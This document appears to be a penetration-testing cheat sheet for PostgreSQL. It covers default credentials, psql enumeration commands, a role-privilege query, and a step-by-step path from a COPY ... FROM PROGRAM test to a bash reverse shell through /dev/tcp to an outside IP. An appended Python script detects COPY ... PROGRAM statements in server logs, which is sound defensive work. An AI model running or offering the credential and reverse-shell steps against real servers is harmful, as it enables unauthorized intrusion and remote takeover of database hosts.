PostgreSQL | Port 5432, 5433
Some basic methodologies to enumerate PostgreSQL.
Default user and password for PostgreSQL
1. postgres:postgres
Connect to PostgreSQL
psql -h $host -p $PORT -U $UserName
Connecting to a specific database
psql -h $host -p $PORT -U $UserName -d <database>
Replace host, port, username, password and database name with the information you enumerated/found.
Enumeration after connection
- List databases
\list
- Connect to a database from the list
\c <database>
- List tables in the selected database
\dt
- Check user roles
\du
After access
Check permissions
-- Get user roles
SELECT
    r.rolname,
    r.rolsuper,
    r.rolinherit,
    r.rolcreaterole,
    r.rolcreatedb,
    r.rolcanlogin,
    r.rolconnlimit,
    r.rolvaliduntil,
    -- roles this role is a member of
    ARRAY(SELECT b.rolname
          FROM pg_catalog.pg_auth_members m
          JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
          WHERE m.member = r.oid) AS memberof,
    r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;
If you have execution permission, then execute commands to get a reverse shell.
Check if you can execute something
CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'id';
SELECT * FROM shell;
Execute these one by one, and if they succeed, use the command below to get a reverse shell.
COPY shell FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/192.168.45.169/80 0>&1"';
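On the defending side, the `COPY ... FROM PROGRAM` statements above show up in the server's statement log. The following added example (not part of the original page) flags them, assuming `log_statement = 'all'` and `log_line_prefix = '%m [%p] %u@%d '`; the function names and sample log lines are constructed for illustration.

```python
import re

# Assumption: log_statement = 'all' and log_line_prefix = '%m [%p] %u@%d '.
ENTRY = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+ \S+) \[(?P<pid>\d+)\] "
    r"(?P<user>[^@\s]*)@(?P<db>\S*) LOG:\s+(?:statement|execute [^:]*): (?P<sql>.*)$",
    re.DOTALL,
)
# String literals and comments are blanked first so quoted text cannot match.
NOISE = re.compile(r"'(?:[^']|'')*'|--[^\n]*|/\*.*?\*/", re.DOTALL)
COPY_PROGRAM = re.compile(r"\bCOPY\b[^;]*?\b(FROM|TO)\s+PROGRAM\b", re.I)

def entries(lines):
    """Rejoin multi-line statements: continuation lines start with a tab."""
    current = None
    for line in lines:
        if line.startswith("\t") and current is not None:
            current += "\n" + line[1:]
        else:
            if current is not None:
                yield current
            current = line
    if current is not None:
        yield current

def find_copy_program(lines):
    """Return one dict per logged statement that uses COPY ... PROGRAM."""
    hits = []
    for entry in entries(lines):
        m = ENTRY.match(entry)
        if not m:
            continue
        hit = COPY_PROGRAM.search(NOISE.sub(" ", m["sql"]))
        if hit:
            hits.append({"ts": m["ts"], "user": m["user"], "db": m["db"],
                         "direction": hit.group(1).upper()})
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    "2024-05-01 10:00:01.120 UTC [4101] app@shop LOG:  statement: SELECT * FROM orders;",
    "2024-05-01 10:00:02.300 UTC [4102] postgres@postgres LOG:  statement: COPY shell FROM PROGRAM 'id';",
    "2024-05-01 10:00:03.000 UTC [4103] app@shop LOG:  statement: SELECT 'copy t from program x';",
    "2024-05-01 10:00:04.450 UTC [4104] etl@shop LOG:  statement: copy (SELECT 1)",
    "\tto   program 'cat';",
    "2024-05-01 10:00:05.000 UTC [4105] etl@shop LOG:  statement: COPY orders FROM '/tmp/orders.csv';",
]

print(find_copy_program(SAMPLE))
```

Dollar-quoted strings are not blanked, so a statement that only mentions the keywords inside `$$...$$` is still flagged and needs manual review.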
📚 References
If you want to learn more commands, these are good references:
- hasura.io - Quick Commands
- neon.com - Important commands
- geeksforgeeks - To learn psql commands
- postgresql - Official guide for psql